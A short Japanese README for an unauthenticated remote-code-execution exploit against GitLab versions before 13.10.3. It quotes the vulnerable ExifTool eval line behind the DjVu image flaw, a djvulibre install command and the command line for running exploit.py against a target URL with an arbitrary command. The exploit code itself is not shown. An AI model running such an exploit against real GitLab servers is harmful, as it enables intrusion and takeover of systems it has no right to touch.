
GitLab 13.10.3より前のバージョン向けの認証されていないリモートコード実行エクスプロイト。ExifTool DjVuアノテーション解析を利用し、巧妙に細工された画像アップロードを介して任意のコマンドを実行します。
Gitlab バージョン < 13.10.3 向けの未認証RCEエクスプロイト
教育/研究目的のみ。使用は自己責任で
根本原因:
# convert C escape sequences (allowed in quoted text)
$tok = eval qq{"$tok"};
動作には djvumake と djvulibre のインストールが必要です
djvulibre をインストール(まだインストールしていない場合)
sudo apt-get install -y djvulibre-bin
エクスプロイトを実行
python3 exploit.py -t <gitlab_url> -c <command>
バージョン 13.10.1-ce.0 でテスト済み